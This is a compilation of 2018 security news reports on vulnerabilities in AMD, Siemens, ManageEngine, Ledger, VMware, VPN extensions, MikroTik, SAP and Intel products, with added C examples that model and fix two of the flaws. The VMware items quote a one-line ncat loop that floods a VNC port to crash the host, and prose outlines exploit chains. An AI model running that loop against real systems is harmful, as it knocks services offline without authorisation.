CTS Labs, which no one heard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.

While initially many doubted CTS Labs’ claims due to the lack of technical information, an increasing number of independent researchers have confirmed that the vulnerabilities do in fact exist. Nevertheless, there are still many industry professionals who believe their severity has been greatly exaggerated.

Trail of Bits was the first to independently review the findings. The company, which has been paid for its services, has confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”

“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits said in a blog post.

On Monday, Check Point also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”

“In our opinion the original CTS Labs report might have been problematically phrased in a way that misrepresented the threat model and impact that the RYZENFALL-1 and RYZENFALL-3 vulnerabilities present,” Check Point said in a blog post. “However, problematic phrasing aside, after inspecting the technical details of the above, we can indeed verify that these are valid vulnerabilities and the risks they pose should be taken under consideration.”

Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”

AMD is investigating the claims, but it has yet to make any statement regarding the impact of the flaws.

Less than an hour after CTS Labs released its report, a controversial company named Viceroy Research published what it described as an “obituary” in hopes of leveraging the findings to short AMD stock. Since CTS’s report also included a disclaimer noting that the company had a financial interest, many assumed the two were working together to short AMD.

While CTS has avoided answering questions regarding its financial interests, Viceroy representatives told Vice’s Motherboard that the company obtained the report describing the vulnerabilities from an “anonymous tipster” and claimed to have no connection to the security firm.

Viceroy’s attempt has had an insignificant impact on AMD stock and experts doubt the situation will change. This is not actually surprising considering that Intel was hit the hardest by Meltdown and Spectre — critical vulnerabilities disclosed by reputable researchers — and still the impact on the company’s stock has been only minor and temporary.


AMD Says Patches Coming Soon for Chip Vulnerabilities
21.3.2018 securityweek
Vulnerebility

AMD Chip Vulnerabilities to be Addressed Through BIOS Updates - No Performance Impact Expected

After investigating recent claims from a security firm that its processors are affected by more than a dozen serious vulnerabilities, chipmaker Advanced Micro Devices (AMD) on Tuesday said patches are coming to address several security flaws in its chips.

In its first public update after the surprise disclosure of the vulnerabilities by Israeli-based security firm CTS Labs, AMD said the issues are associated with the firmware managing the embedded security control processor in some of its products (AMD Secure Processor) and the chipset used in some socket AM4 and socket TR4 desktop platforms supporting AMD processors.

Vulnerabilities found in Ryzen and other AMD processors

CTS Labs, which was unheard of until last week, came under fire shortly after its disclosure for giving AMD only a 24-hour notice before going public with its findings, and for apparently attempting to short AMD stock. The company later made some clarifications regarding the flaws and its disclosure method.

CTS Labs claimed that a number of vulnerabilities could be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.

“AMD has rapidly completed its assessment and is in the process of developing and staging the deployment of mitigations,” the chipmaker wrote in an update on Tuesday. “It’s important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.”

AMD said that patches will be released through BIOS updates to address the flaws, which have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA. The company said that no performance impact is expected for any of the forthcoming mitigations.

AMD attempted to downplay the risks, saying that any attacker gaining administrative access could have a wide range of attacks at their disposal “well beyond the exploits identified in this research.”

“Further, all modern operating systems and enterprise-quality hypervisors today have many effective security controls, such as Microsoft Windows Credential Guard in the Windows environment, in place to prevent unauthorized administrative access that would need to be overcome in order to affect these security issues,” the notice continued.

AMD also linked to a blog post from Trail of Bits, which was the first to independently review the findings from CTS. The company, which has been paid for its services, confirmed that the proof-of-concept (PoC) exploits developed by CTS Labs work as intended, but believes that there is “no immediate risk of exploitation of these vulnerabilities for most users.”

“Even if the full details were published today, attackers would need to invest significant development efforts to build attack tools that utilize these vulnerabilities. This level of effort is beyond the reach of most attackers,” Trail of Bits added.

Check Point has also confirmed two of the RYZENFALL vulnerabilities following its own review. The security firm says it does not have any relationship with CTS Labs and it has not received any payment for its services. It also noted that it does not agree with the way CTS disclosed its findings, describing it as “very irresponsible.”

Alex Ionescu, a reputable researcher and Windows security expert, also confirmed the findings and warned that “admin-level access and persistence are legitimate threats in multi-tenant IaaS and even things such as VTL0/1 (Credential Guard) when firmware and chipset trust boundaries are broken.”

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings,” AMD stated last week.

Some have compared the recent AMD vulnerabilities to Meltdown and Spectre, which impact CPUs from Intel, AMD, ARM and others. However, some argued that the issues disclosed by CTS Labs are nowhere near as severe due to the fact that they mostly impact AMD’s Secure Processor technology rather than the hardware itself.

AMD did not provide specific dates that patches are expected to be released, but said it would provide additional updates on both its analysis of the issues and the related mitigation plans in the coming weeks.


Siemens Patches Flaws in SIMATIC Controllers, Mobile Apps
21.3.2018 securityweek
Vulnerebility

German industrial giant Siemens has released security patches for several of its SIMATIC products, including some controllers and a mobile application.

Organizations using SIMATIC products were informed by both Siemens and ICS-CERT this week of a denial-of-service (DoS) vulnerability that can be exploited by sending specially crafted PROFINET DCP packets to affected systems.

The flaw, tracked as CVE-2018-4843 and classified as medium severity, can be exploited by an attacker who has access to the network housing the targeted device. While DoS vulnerabilities are generally seen as less severe compared to code execution and other types of flaws, in the case of industrial control systems (ICS), they can have serious impact.

The security hole affects several SIMATIC central processing units (CPUs) and software controllers, SINUMERIK CNC automation solutions, and Softnet PROFINET IO controllers. Siemens has released patches for some of the impacted systems, and provided workarounds and mitigations for the rest.

Siemens also informed customers on Tuesday of an access control vulnerability affecting the Android and iOS versions of its SIMATIC WinCC OA UI mobile application. This app is designed to allow users to remotely access WinCC OA facilities from their mobile devices.

“The latest update for the Android app and iOS app SIMATIC WinCC OA UI fix a security vulnerability which could allow read and write access from one HMI project cache folder to other HMI project cache folders within the app’s sandbox on the same mobile device,” Siemens wrote in its advisory.

“This includes HMI project cache folders of other configured WinCC OA servers. Precondition for this scenario is that an attacker tricks an app user to connect to an attacker-controlled WinCC OA server,” it added.

The SIMATIC WinCC OA UI application vulnerability was discovered by experts at IOActive and Embedi as part of their research into SCADA mobile apps. They analyzed applications from 34 vendors and found security holes in a vast majority of them.


Code Execution Flaws Found in ManageEngine Products
21.3.2018 securityweek
Vulnerebility

Researchers at cybersecurity technology and services provider Digital Defense have identified another round of vulnerabilities affecting products from Zoho-owned ManageEngine.

ManageEngine provides network, data center, desktop, mobile device, and security solutions to more than 40,000 customers, including three out of every five Fortune 500 companies.

Earlier this year, Digital Defense reported finding several potentially serious flaws in ManageEngine’s ServiceDesk Plus help desk software, and on Wednesday the company disclosed the details of six additional security holes found by its researchers in ManageEngine Log360, EventLog Analyzer, and Applications Manager products.

The vulnerabilities have been described by Digital Defense as file upload, blind SQL injection, local file inclusion, and API key disclosure issues that can be exploited without authentication for arbitrary code execution and obtaining potentially sensitive information.

According to the security firm, the Log360 and EventLog Analyzer log management products are affected by an unauthenticated file upload vulnerability that can be exploited to upload a JavaServer Pages (JSP) web shell to the root directory. This is possible due to the fact that a file upload feature’s security checks can be easily bypassed.

The rest of the flaws discovered by Digital Defense researchers impact ManageEngine Applications Manager and many of them can be exploited for arbitrary code execution.

Experts have identified several blind SQL injection flaws that can be leveraged by unauthenticated attackers to execute arbitrary code with SYSTEM privileges and gain complete control of the targeted host.

The list of security holes also includes a local file inclusion issue that can be exploited to download files that may contain sensitive information.

Researchers also discovered that an attacker can obtain an Applications Manager user’s API key by sending a specially crafted GET request.

“Depending on the privilege level of the compromised user, this could result in full compromise of both the Applications Manager web application and the host running it,” Digital Defense warned.

The vulnerabilities were reported to ManageEngine on February 12 and fixes were developed a few weeks later. Patches were made available to customers on March 7.


AMD will release the patches for the recently discovered flaws very soon
21.3.2018 securityaffairs 
Vulnerebility

AMD concluded its investigation on the vulnerabilities recently discovered by CTS Labs and announced that security patches will be released very soon.
AMD has finally acknowledged 13 critical vulnerabilities and exploitable backdoors in its Ryzen and EPYC processors that were first disclosed earlier in March by researchers at the security firm CTS Labs.

The CTS Labs researchers did not disclose any technical details about the vulnerabilities to avoid abuses in the wild.

The vendor plans to roll out firmware updates in the coming weeks to address the flaws, which affect millions of devices worldwide.

The flaws could be potentially exploited to steal sensitive data, install malicious code on AMD-based systems, and gain full access to the compromised systems. The flaws expose servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors to attacks.

CTS-Labs promptly reported the flaws to AMD, Microsoft and “a small number of companies that could produce patches and mitigations.”

The analysis conducted by the security experts revealed four classes (RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY) of vulnerabilities affecting the AMD Zen architecture processors and chipsets that usually contain sensitive information such as passwords and encryption keys.

The flaws could allow attackers to bypass AMD’s Secure Encrypted Virtualization (SEV) technology as well as Microsoft Windows Credential Guard.

This week AMD published a press release trying to downplay the severity of the flaws.

“It’s important to note that all the issues raised in the research require administrative access to the system, a type of access that effectively grants the user unrestricted access to the system and the right to delete, create or modify any of the folders or files on the computer, as well as change any settings.” reads the press release published by AMD. “Any attacker gaining unauthorized administrative access would have a wide range of attacks at their disposal well beyond the exploits identified in this research.”

Unlike what happened with the Meltdown and Spectre mitigations, AMD maintains that the patches it is going to release are not expected to impact system performance.

CTS Labs is skeptical about a rapid fix of the issues; it claimed that AMD could take several months to release patches for most of the flaws, and that some of them may not be fixable at all.


A flaw in Ledger Crypto Wallets could allow to drain your cryptocurrency accounts. Fix it!
21.3.2018 securityaffairs 
Vulnerebility
Saleem Rashid, a 15-year-old researcher from the UK, has discovered a severe vulnerability in cryptocurrency hardware wallets made by the Ledger company.
Hardware wallets sign transactions over a connection to a USB port on the user’s machine, but they never share the private key with the host machine, which makes it impossible for malware on the host to harvest the keys.

Saleem Rashid has found a way to retrieve the private keys from Ledger devices once physical access to the device has been obtained.

The researcher discovered that a reseller of Ledger’s devices could update the devices with malware designed to steal the private key and drain the user’s cryptocurrency accounts once the user starts using the device.

Taking a close look at Ledger’s hardware devices, Saleem Rashid discovered that they include a secure processor chip and a non-secure microcontroller chip. The non-secure chip handles non-security tasks such as displaying text on the screen. The problem stems from the fact that the two chips exchange data, and an attacker who compromises the insecure microcontroller on a Ledger device can run malicious code on it undetected.

Even though Ledger devices implement a mechanism to protect the integrity of the code running on them, the expert developed proof-of-concept code to bypass it and run malicious code on the products.


The PoC code was published along with the official announcement from Ledger about the availability of a new firmware update that addresses the vulnerability.

“You’re essentially trusting a non-secure chip not to change what’s displayed on the screen or change what the buttons are saying,” Rashid told the popular cyber security expert Brian Krebs. “You can install whatever you want on that non-secure chip, because the code running on there can lie to you.”

Rashid published a research paper on the flaw and a video PoC of the attack against a Nano-S device, one of the most popular hardware wallets sold by the company.

“This attack would require the user to update the MCU firmware on an infected computer. This could be achieved by displaying an error message that asks the user to reconnect the device with the left button held down (to enter the MCU bootloader). Then the malware can update the MCU with malicious code, allowing the malware to take control of the trusted display and confirmation buttons on the device. This attack becomes incredibly lucrative if used when a legitimate firmware update is released, as was the case two weeks ago.” wrote the researcher.

“As you can tell from the video above, it is trivial to perform a supply chain attack that modifies the generated recovery seed. Since all private keys are derived from the recovery seed, the attacker could steal any funds loaded onto the device.” continues the expert.

The Ledger MCU exploit relies on the fact that the process for generating the backup code (recovery seed) for a user’s private key depends on a random number generator that can be forced to behave predictably and produce non-random results.

Curiously, when Rashid first reported his findings to Ledger, the company dismissed them.

“the firmware update patches three security issues. The update process verifies the integrity of your device and a successful 1.4.1 update is the guarantee that your device has not been the target of any of the patched attack. There is no need to take any other action, your seed / private keys are safe.” reads the security advisory published by the French company.

“Thimotee Isnard and Sergei Volokitin followed the responsible disclosure agreement process and were awarded with a Bounty, while Saleem Rashid refused to sign the Ledger Bounty Program Reward Agreement.”

Rashid pointed out that Ledger does not include anti-tampering protection to prevent an attacker from physically opening a device, but the company replied that such measures are very easy to counterfeit.

In this case, let me suggest buying the devices directly from the official vendor rather than from third-party partners, and updating them with the latest firmware release.


VMware addresses a DoS flaw in Workstation and Fusion products
18.3.2018 securityaffairs
Vulnerebility

VMware has addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-6957, in its Workstation 12.x and 14.x and Fusion 10.1.1. and 10.x on OS X products.
The affected VMware products can be attacked by opening a large number of VNC sessions. The DoS vulnerability was discovered by Lilith Wyatt of Cisco Talos; the flaw can be exploited on Workstation and Fusion only if VNC has been manually enabled.

VNC implementation in VMware solutions is used for remote management purposes.

“VMware Workstation and Fusion contain a denial-of-service vulnerability which can be triggered by opening a large number of VNC sessions.” reads the security advisory published by VMware.

The company issued the security patches in Workstation 14.1.1 and Fusion 10.1.1. VMware also shared details about a workaround for Workstation 12.x and Fusion 8.x releases that involves setting a password for the VNC connection.

While VMware has classified the vulnerability as “important,” Cisco Talos has ranked it as a “high severity” flaw and assigned it a CVSS score of 7.5.

Experts at Cisco Talos confirmed that an attacker can trigger the flaw on a targeted server and cause the virtual machine to shut down by opening a large number of VNC sessions.

“Since the VMware VNC server is naturally multi-threaded, there are locks and semaphores and mutexes to deal with shared variables.” reads the advisory published by Talos.

“The VNC server also maintains a global variable that indicates the amount of locks that are currently used, that is incremented by certain events.”


Talos published the Proof-of-Concept exploit code:

# There are obviously better ways to do this
for x in `seq 0 $(( 0xffffff/2 ))`; do echo "doop" | ncat <targetIP> <VNCPort>; done
“Regardless, the important thing to note here is that the incrementing instruction (lock xadd cs:MxLockCounter, eax) is the only cross-reference to the MxLockCounter global variable, meaning it never gets decremented.” continues Talos.

“Thus, as long as an attacker can initiate a bunch of TCP connections to the VNC server (each successful connection increments it twice), without even sending any other datagrams, an attacker can eventually shutdown the connected virtual machine.”

Below is the timeline for the flaw:

2017-07-13 – Vendor Disclosure
2018-03-15 – Public Release


Warning – 3 Popular VPN Services Are Leaking Your IP Address
17.3.2018 thehackernews
Vulnerebility

Researchers found critical vulnerabilities in three popular VPN services that could leak users' real IP addresses and other sensitive data.
A VPN, or Virtual Private Network, is a great way to protect your daily online activities: it works by encrypting your data and boosting security, and it is also useful for obscuring your actual IP address.
While some choose VPN services for online anonymity and data security, one major reason many people use VPN is to hide their real IP addresses to bypass online censorship and access websites that are blocked by their ISPs.
But what if the VPN you thought was protecting your privacy is actually leaking your sensitive data and real location?
A team of three ethical hackers hired by privacy advocate firm VPN Mentor revealed that three popular VPN service providers—HotSpot Shield, PureVPN, and Zenmate—with millions of customers worldwide were found vulnerable to flaws that could compromise user's privacy.
The team includes application security researcher Paulos Yibelo, an ethical hacker known by his alias 'File Descriptor' who works for Cure53, and a third member whose identity has not been revealed at their request.
PureVPN is the same company that claimed to have a 'no log' policy, but a few months ago helped the FBI with logs that led to the arrest of a Massachusetts man in a cyberstalking case.
After a series of privacy tests on the three VPN services, the team found that all three VPN services are leaking their users' real IP addresses, which can be used to identify individual users and their actual location.
Concerning consequences for end users, VPN Mentor explains that the vulnerabilities could "allow governments, hostile organizations [sic], or individuals to identify the actual IP address of a user, even with the use of the VPNs."
The issues in ZenMate and PureVPN have not been disclosed since they have not yet been patched, while VPN Mentor says the issues discovered in ZenMate VPN were less severe than those in HotSpot Shield and PureVPN.
The team found three separate vulnerabilities in AnchorFree's HotSpot Shield, which have been fixed by the company. Here's the list:
Hijack all traffic (CVE-2018-7879) — This vulnerability resided in Hotspot Shield’s Chrome extension and could have allowed remote hackers to hijack and redirect victim's web traffic to a malicious site.
DNS leak (CVE-2018-7878) — DNS leak flaw in Hotspot Shield exposed users' original IP address to the DNS server, allowing ISPs to monitor and record their online activities.
Real IP Address leak (CVE-2018-7880) — This flaw poses a privacy threat to users since hackers can track a user's real location and ISP. The issue occurred because the extension had a loose whitelist for "direct connection." Researchers found that any domain containing localhost, e.g., localhost.foo.bar.com, together with 'type=a1fproxyspeedtest' in the URL bypasses the proxy and leaks the real IP address.
Here it must be noted that all three vulnerabilities were in HotSpot Shield's free Chrome plug-in, not in the desktop or smartphone apps.
The researchers also reported similar vulnerabilities in the Chrome plugins of Zenmate and PureVPN, but for now the details of the bugs are being kept under wraps since neither vendor has fixed them yet.
Researchers believe that most other VPN services also suffer from similar issues.


Remotely Exploitable Vulnerability Discovered in MikroTik's RouterOS
16.3.2018 securityweek
Exploit  Vulnerebility

A vulnerability exists in MikroTik's RouterOS in versions prior to the latest 6.41.3, released Monday, March 12, 2018. Details were discovered in February and disclosed by Core Security on Thursday.

MikroTik is a Latvian manufacturer that develops routers and software used throughout the world. RouterOS is its Linux-based operating system.

The vulnerability, a MikroTik RouterOS SMB buffer overflow flaw, allows a remote attacker with access to the service to gain code execution on the system. Since the overflow occurs before authentication, an unauthenticated remote attacker can exploit it.

The vulnerability exists because the first byte of the source buffer is read and used as the size for the copy operation to the destination buffer -- but ultimately, no validation is performed to ensure that the data fits into the destination buffer, potentially allowing a stack overflow.
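The pattern described above, a length byte taken from the message and used as the copy size without checking it against the destination, is illustrated in this added example (not code from Core's advisory or from RouterOS). The single-length-byte message layout, the 64-byte buffer size and the sample messages are assumptions constructed for the example; the hardened parser shows the two checks the vulnerable code lacked.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed message layout for this model: one length byte followed by that
 * many payload bytes.  The real RouterOS SMB/NetBIOS structures are not
 * reproduced here. */
#define NAME_BUF_SIZE 64   /* assumed fixed stack buffer capacity */

typedef enum {
    PARSE_OK = 0,
    PARSE_TRUNCATED = -1,   /* length byte claims more data than was received */
    PARSE_TOO_LONG = -2     /* length byte exceeds the destination capacity  */
} parse_status_t;

/* "Before" logic, modelled without performing the overflow: return the copy
 * length the vulnerable code would have handed to the copy routine.  Any
 * value above NAME_BUF_SIZE would have written past the stack buffer. */
size_t unchecked_copy_length(const uint8_t *msg, size_t msg_len) {
    if (msg_len == 0) return 0;
    return msg[0];   /* first byte of the source used as-is as the copy size */
}

/* Hardened parser: validate the claimed length against both the bytes that
 * are actually present on the wire and the capacity of the destination
 * before a single byte is copied. */
parse_status_t parse_name_field(const uint8_t *msg, size_t msg_len,
                                uint8_t *dst, size_t dst_cap, size_t *out_len) {
    if (msg_len < 1) return PARSE_TRUNCATED;
    size_t claimed = msg[0];
    if (claimed > msg_len - 1) return PARSE_TRUNCATED;   /* more than received */
    if (claimed > dst_cap) return PARSE_TOO_LONG;        /* would not fit dst */
    memcpy(dst, msg + 1, claimed);
    *out_len = claimed;
    return PARSE_OK;
}

/* Parse into a fixed-size stack buffer, as the vulnerable function did. */
parse_status_t check_message(const uint8_t *msg, size_t msg_len, size_t *out_len) {
    uint8_t name[NAME_BUF_SIZE];
    return parse_name_field(msg, msg_len, name, sizeof name, out_len);
}

/* Build a constructed message whose length byte claims `claimed` payload
 * bytes while `present` payload bytes are actually attached, then parse it. */
parse_status_t check_constructed(uint8_t claimed, size_t present, size_t *out_len) {
    uint8_t msg[256];
    if (present > sizeof msg - 1) present = sizeof msg - 1;
    msg[0] = claimed;
    memset(msg + 1, 'A', present);
    return check_message(msg, 1 + present, out_len);
}

int main(void) {
    size_t n = 0;
    /* Benign 4-byte name: accepted. */
    parse_status_t ok = check_constructed(4, 4, &n);
    /* Length byte 200 with a 64-byte destination: rejected instead of overflowing. */
    parse_status_t too_long = check_constructed(200, 200, &n);
    /* Length byte 10 but only 3 payload bytes received: rejected as truncated. */
    parse_status_t truncated = check_constructed(10, 3, &n);
    return (ok == PARSE_OK && too_long == PARSE_TOO_LONG && truncated == PARSE_TRUNCATED) ? 0 : 1;
}
```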

Core's vulnerability advisory includes a proof of concept exploit against MikroTik's x86 Cloud Hosted Router. The function is reached by sending a NetBIOS session request message. Data execution prevention (DEP) is bypassed with a return-oriented programming (ROP) chain that calls 'mprotect' to mark a memory region as both writable and executable. Address space layout randomization (ASLR) can be neutralized because the base address of the heap is not randomized. This allows a payload on the heap to jump to a fixed location.

"Our testing," says Core's advisory, "showed this approach to be extremely reliable." The reserved CVE number is CVE-2018-7445.

Core sent its initial vulnerability notice to MikroTik on February 19, 2018. On the same day, Core noticed the flaw was already scheduled for a fix by MikroTik in a new software release candidate. Core asked for a coordinated publication of the new version and its own advisory. It proposed March 1, 2018, which was confirmed by MikroTik. MikroTik then asked for an extension to Thursday, March 8, 2018, and then told Core it still wouldn't be ready.

On Monday, March 12, 2018, it released the new version. It did not inform Core, and there is no apparent mention of the flaw or the fix in its new version announcement to customers -- but it subsequently confirmed that the flaw has been fixed. MikroTik's advice for customers that cannot upgrade is that they should turn off SMB.

Last week, Kaspersky Lab released a report on a hacking group it calls Slingshot. It has identified around 100 victims. The attackers gain access by first getting control of MikroTik routers, and using that position to download DLL files to the target computer via MikroTik's Winbox management tool.

It is not clear at this point whether the Slingshot group gained access to the MikroTik routers using the CVE-2018-7445 vulnerability, but it is tempting to think so. Kaspersky Lab informed the company about its research prior to its own publication.

While the router vulnerability would be the first stage of the attack, the second stage would be the use of Winbox to get the malicious downloads. MikroTik claims on its support forum that Winbox is secure. In a thread started by a customer disturbed at learning about Slingshot from reports in the media rather than from MikroTik, MikroTik responded, "There is NO insecure Winbox v3. Winbox v3 was released in 2014. Even if somebody was using a really old Winbox v2, they still had to have an unsecured RouterOS device so that somebody could compromise it (firewall had to be removed). This is why they found only 120 affected machines since 2012."

The bottom line is that MikroTik is quick to fix issues it knows about, but prefers to maintain a low profile over those problems. The danger here is that existing customers might not be aware of the issues, and be in no hurry to upgrade. MikroTik customers should be aware that a proven proof of concept exploit for vulnerability CVE-2018-7445 is in the public domain, and the 'patch' for this exploit is to upgrade RouterOS to version 6.41.3.


VMware Patches DoS Vulnerability in Workstation, Fusion
16.3.2018 securityweek
Vulnerebility

VMware informed customers on Thursday that it has patched a denial-of-service (DoS) vulnerability in its Workstation and Fusion products. Details of the flaw and proof-of-concept code have been made public.

In its advisory, VMware said the vulnerability affects Workstation 12.x and 14.x on all platforms, and Fusion 8.x and 10.x on OS X. Patches are included in Workstation 14.1.1 and Fusion 10.1.1. A workaround that involves setting a password for the VNC connection can be applied to Workstation 12.x and Fusion 8.x releases.

The flaw, tracked as CVE-2018-6957, was discovered by Lilith Wyatt of Cisco Talos. VMware says it can be exploited to cause a DoS condition by opening a large number of VNC sessions. VNC, which is used in VMware products for remote management and automation purposes, must be manually enabled for the exploit to work.

While VMware has classified the vulnerability as “important,” Cisco Talos has assigned it a CVSS score of 7.5, which puts it in the “high severity” category.

In its own advisory, Cisco said an attacker can trigger an exception on a targeted server and cause the virtual machine to shut down by initiating numerous VNC sessions.

“Since the VMware VNC server is naturally multi-threaded, there are locks and semaphores and mutexes to deal with shared variables. The VNC server also maintains a global variable that indicates the amount of locks that are currently used, that is incremented by certain events,” Talos explained.

The code uses a variable to count the locks and ensure that their number is not too high. Wyatt discovered that each TCP connection to the VNC increments this variable twice, and initiating a large number of connections will eventually lead to a DoS condition and a shutdown of the VM. Cisco’s advisory includes a one-line PoC exploit.
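The lock-counter defect that Talos describes (a global count of locks in use that every accepted TCP connection increments twice and that nothing ever decrements) is modelled in this added example, which is not VMware's or Talos's code. The shutdown threshold and the two-increments-per-connection bookkeeping are assumptions of the model; the hardened variant shows the matching release on connection teardown that makes idle connect/disconnect cycles harmless.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Model of the VNC server's global lock bookkeeping (MxLockCounter in the
 * advisory).  The limit at which the guest is powered off is an assumed
 * value for this model; the real threshold is not given on the page. */
typedef struct {
    uint32_t lock_counter;   /* "locks currently in use" */
    uint32_t lock_limit;     /* sanity threshold; reaching it shuts the VM down */
    bool vm_shut_down;
} vnc_server_t;

static void server_init(vnc_server_t *s, uint32_t limit) {
    s->lock_counter = 0;
    s->lock_limit = limit;
    s->vm_shut_down = false;
}

/* Shared by both models: the increment and the "too many locks" check. */
static void lock_acquire(vnc_server_t *s) {
    s->lock_counter++;                      /* the lone "lock xadd" increment */
    if (s->lock_counter >= s->lock_limit)   /* sanity check trips: VM powered off */
        s->vm_shut_down = true;
}

/* Vulnerable behaviour: each connection acquires twice and never releases,
 * so the counter only ever grows, even for connections that send nothing. */
void vulnerable_connection(vnc_server_t *s) {
    lock_acquire(s);   /* accept */
    lock_acquire(s);   /* session setup */
    /* client disconnects: no matching decrement */
}

/* Hardened behaviour: every acquire is paired with a release on teardown. */
static void lock_release(vnc_server_t *s) {
    if (s->lock_counter > 0) s->lock_counter--;
}
void hardened_connection(vnc_server_t *s) {
    lock_acquire(s);
    lock_acquire(s);
    lock_release(s);   /* session torn down */
    lock_release(s);   /* socket closed */
}

/* Drive up to `n` idle connections through a model.  Returns the number of
 * connections at which the VM shut down, or 0 if it never did. */
size_t connections_until_shutdown(vnc_server_t *s, size_t n,
                                  void (*conn)(vnc_server_t *)) {
    for (size_t i = 1; i <= n; i++) {
        conn(s);
        if (s->vm_shut_down) return i;
    }
    return 0;
}

/* Convenience entry point: fresh server with `limit`, `max_conns` idle
 * connections, vulnerable or hardened bookkeeping. */
size_t simulate(uint32_t limit, size_t max_conns, bool hardened) {
    vnc_server_t s;
    server_init(&s, limit);
    return connections_until_shutdown(&s, max_conns,
                                      hardened ? hardened_connection
                                               : vulnerable_connection);
}

int main(void) {
    /* With an assumed limit of 1000 the vulnerable model dies after 500
     * connections (2 increments each); the hardened model never does. */
    printf("vulnerable: shutdown after %zu connections\n", simulate(1000, 100000, false));
    printf("hardened:   shutdown after %zu connections (0 = never)\n", simulate(1000, 100000, true));
    return 0;
}
```

The same arithmetic is what the one-line PoC quoted earlier relies on: half the threshold in connections, because each one counts twice.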

VMware sponsored the recent Pwn2Own 2018 hacking competition and offered up to $70,000 for VMware Workstation exploits. However, none of the contestants targeted the company’s products. At last year’s event, white hat hackers did disclose exploits that included VMware virtual machine escapes.


Hacking SAP CRM by chaining 2 vulnerabilities in SAP NetWeaver AS Java
16.3.2018 securityaffairs 
Vulnerebility

Security experts at ERPScan explained that by chaining two recently patched flaws it is possible to hack SAP CRM systems and access sensitive data.
Security experts at ERPScan discovered that chaining the exploits for two security vulnerabilities in SAP NetWeaver Application Server Java patched last month, an attacker can hack customer relationship management (CRM) systems.

CRMs are critical business systems used to manage sensitive data such as clients’ personal information, prices and contact points.

The flaws are a directory traversal issue and a log injection vulnerability; their combination could lead to information disclosure, privilege escalation and full compromise of SAP CRM installations.

Considered individually the flaws are not particularly severe: they received CVSS v3 base scores of 6.3 and 7.7 respectively.

“The security researchers at ERPScan identified directory traversal and log injection vulnerabilities in the solution. The two issues in combination lead to information disclosure, privilege escalation, and complete SAP systems compromise. The two vulnerabilities can wreak havoc in any company running SAP CRM.” explained Vahagn Vardanyan, senior security researcher of ERPScan.

According to ERPScan, there are more than 500 vulnerable SAP CRM systems exposed online.

The experts described the full attack scenario, which consists of the following steps:

An attacker uses the first directory traversal vulnerability to read administrator credentials in an encrypted form.
He or she decrypts the credentials, since the algorithm is known and the key is stored in the same directory. More about decrypting SecStore can be found here.
The attacker logs in to the SAP CRM portal.
The attacker exploits another directory traversal vulnerability and changes the SAP log file path to the web application root path.
Finally, using a specially crafted request, he or she can inject malicious code (a web shell) into the log file and call it anonymously from a remote web server.

ERPScan shared details of the vulnerabilities with SAP and assisted in the development of the security patches.

ERPScan researchers disclosed details of the vulnerabilities during a talk at the Troopers security conference. The researchers explained how remote attackers can chain the flaws to read any file on unpatched SAP CRM systems without authentication.


Intel Shares Details on New CPUs With Spectre, Meltdown Protections
15.3.2018 securityweek
Vulnerebility

Intel announced on Thursday that patches designed to address the Spectre vulnerability are now available for all the affected CPUs released in the past five years, and shared more details on the future processors that will include protections against these types of attacks.

Intel CEO Brian Krzanich informed customers that the company has made available microcode updates for “100 percent” of the recent processors vulnerable to Meltdown and Spectre attacks.

The company first released new firmware updates for its Skylake processors, then for Kaby Lake and Coffee Lake, and later for Broadwell and Haswell CPUs. The fixes will be delivered by device manufacturers, but Microsoft has also started providing the microcode patches for Windows 10 devices with Skylake, Coffee Lake and Kaby Lake processors.

Intel building CPUs with Meltdown and Spectre protections

In late January, Krzanich revealed that the company had started working on processors with built-in protections against attacks similar to Meltdown and Spectre. Additional details have now been provided, and Intel has even published a video that explains at a high level how these side-channel attacks work and how it plans to prevent them.

Meltdown attacks rely on a vulnerability identified as CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Variant 1 can be addressed with software patches, but Variant 2 also requires microcode updates.

Intel’s new CPUs, both for data centers and PCs, will be redesigned to protect against Meltdown and Spectre Variant 2.

“We have redesigned parts of the processor to introduce new levels of protection through partitioning that will protect against both Variants 2 and 3. Think of this partitioning as additional ‘protective walls’ between applications and user privilege levels to create an obstacle for bad actors,” Krzanich explained.

These protections are expected to become available in the second half of the year with the release of Intel Xeon Scalable (Cascade Lake) and 8th Generation Intel Core processors.

“As we bring these new products to market, ensuring that they deliver the performance improvements people expect from us is critical. Our goal is to offer not only the best performance, but also the best secure performance,” Krzanich said.


Hackers Can Abuse Text Editors for Privilege Escalation
15.3.2018 securityweek
Vulnerebility

Several popular text editors can be leveraged for privilege escalation and their developers do not plan on taking any action to prevent abuse, according to SafeBreach, a company that specializes in simulating attacks and breaches.

Some text editors allow users to run third-party code and extend the application’s functionality through extensions. While this provides some benefits, an expert determined that it can also introduce security risks.

SafeBreach researcher Dor Azouri has analyzed the Sublime, Vim, Emacs, Gedit, pico and nano text editors, and found that only pico and its clone, nano, are not prone to abuse, mainly due to the fact that they offer only limited extensibility.

